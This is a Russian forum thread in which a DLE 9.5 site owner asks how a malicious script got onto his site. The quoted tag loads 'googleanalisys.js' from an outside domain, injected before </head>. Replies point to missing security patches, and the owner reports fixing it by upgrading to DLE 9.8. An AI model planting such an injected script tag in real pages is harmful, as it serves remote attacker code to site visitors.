Перейти к публикации

Нашел вирусный код в интересном месте...

Рекомендованные сообщения

Здравствуйте. Антивирус Аваст уже вот несколько дней как ругается на мой сайт. Вот собственно и сама "ругань":

image.png

Перелопатил весь код на предмет сторонних JS скриптов, но ничего так и не нашел. Начал копать дальше...

Зашел в мозилу и сделал следующее:

1. правка > выделить все

2. посмотреть исходный код выделенного обьекта

В результате было найдено такое:

<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;g=general&amp;6"></script><script type="text/javascript" src="http://statuses.ws/googleanalisys.js"></script>

И все это сразу перед закрывающимся тегом </head>

Прошу заметить, что при обычном просмотре исходного кода этого не видно.

Скажите, каким образом оно могло попасть на мой сайт? Хм... Глупый вопрос, взлом же :)

Скажите лучше, как защититься от подобного в следующий раз?

DLE 9.5

Сайт m-films.net.

Скажите только, как мне убрать этот гребанный вирусный код? Понять не могу...

Огромное спасибо :)

Изменено пользователем harmoshka

Скажите, каким образом оно могло попасть на мой сайт? Хм... Глупый вопрос, взлом же

Вследствии вовремя не установленных патчей безопасности. Что делать подробно описано на странице http://forum.dle-news.ru/index.php?showtopic=62025&view=findpost&p=309347

Блин. Вот я глупец. Установил патч на все свои сайты кроме этого :)

Проблема решилась путем замены всех файлов в папке /engine/classes на резервные. Пароли меняю. Надеюсь больше не вылезет вся эта хрень.

В кратчайшие сроки постараюсь обновиться до актуальной версии движка. Жду 9.8 :)

Огромное Вам спасибо за помощь, celsoft!

Кстати, метод, который я описал выше - не помог! Посторонний код тут же вернулся на сайт и антивирусники продолжили ругаться...

Сегодня обновился до DLE 9.8. За весь день проблема не вылезла. Надеюсь так будет продолжаться и дальше :)

Изменено пользователем harmoshka

Сегодня обновился до DLE 9.8. За весь день проблема не вылезла. Надеюсь так будет продолжаться и дальше :)

Вопрос не в тему. У меня тоже сайт на дле 9.5, где можно почитать как обновится до 9.8 ?

где можно почитать как обновится до 9.8 ?

В инструкции по обновлению, которая идет в архиве дистрибутива в файле Documentation/upgrade.html

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

• Создать...